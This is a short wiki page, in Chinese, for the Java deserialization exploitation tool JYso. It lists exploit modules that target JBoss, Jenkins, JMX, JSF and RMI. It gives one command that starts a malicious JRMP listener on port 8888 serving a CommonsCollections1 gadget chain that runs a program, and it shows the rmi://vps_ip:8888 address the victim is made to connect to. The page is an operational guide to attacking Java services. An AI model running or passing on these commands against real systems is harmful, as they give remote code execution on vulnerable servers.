Skip to content

8、Exploit

Jump to bottom
炁 edited this page Nov 7, 2024 · 5 revisions

除了单独的参数外,其余参数与 payload 的参数保持一致

  • JBoss
  • JenkinsCLI
  • JenkinsListener
  • JenkinsReverse
  • JMXInvokeMBean
  • JRMPClassLoadingListener
  • JRMPClient
  • JRMPListener
  • JSF
  • RMIBindExploit

例如RMI打反序列化链子

java -cp JYso-[version].jar com.qi4l.JYso.exploit.JRMPListener 8888 -g CommonsCollections1 -p calc

rmi://vps_ip:8888
Clone this wiki locally